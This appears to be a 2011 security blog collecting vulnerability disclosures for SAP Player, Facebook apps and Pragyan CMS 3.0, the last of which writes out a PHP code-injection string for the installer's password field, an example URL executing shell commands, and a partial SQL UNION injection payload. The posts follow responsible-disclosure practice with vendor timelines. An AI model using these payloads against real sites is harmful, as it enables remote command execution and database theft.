Tuesday, July 5, 2011

SAP Player 0.9 (.m3u) universal

This exploit uses direct return address. Not SEH version


Monday, March 21, 2011

Another vulnerability in facebook apps!

This is second sql injection we found in facebook apps.

We tried to contact developers but got no response from them. So we decided to release the vulnerability.

Note:: There are few more facebook apps which we found are vulnerable to sql injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.

A Proof Of Concept of the vulnerability can be seen at::


Wednesday, March 9, 2011

Sql Injection in Facebook applications!

We found a vulnerability in 2 facebook applications. One is patched now so we are disclosing the vulnerability.

There was a SQL Injection vulnerability in apps.facebook.com

Location:: http://apps.facebook.com/twmarketplace/post.php?postid=
Severity:: Critical
Impact:: Database access/server control

It was possible to extract all data of all databases located on that servers

7/3/2010 - Facebook vendors notified
8/3/2010 - Response from verdor
8/3/2010 - Vendor patched the vulnerability
9/3/2010 - Public disclosure

Saturday, February 26, 2011

Pragyan CMS v 3,0 mulltiple vulnerabilities!

During the Pragyan's hacking challange we found these vulnerabilities in their open source CMS.

#Pragyan CMS v 3.0 mutiple Vulnerabilities

#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,


#Web - http://www.aslitsecurity.com/

#Blog - http://bugix-security.blogspot.com


#Pragyan CMS v 3.0

Technical Description

1) Code execution in INSTALL/install.php

script not correctly validate entered fields.

possibility to write at password field string:

");echo exec($_GET["a"]);echo ("

or in another fields with turned of javascript.

in cms/config.inc.php will be code:

define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");

which allows command execution.

EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la

2) sql injection

- get mysql version EXPLOIT::

http://target.com/path/+view&thread_id=-1 UNION ALL SELECT

null,null,null,null,concat(unhex(Hex(cast(@@version as



update to Pragyan CMS 3.0 rev.274


2011-19-02 : Initial release

2011-20-02 : Reported to vendor

2011-25-02 : patch released

2011-25-02 : public disclose



Abhishek Lyall




Abhishek Lyall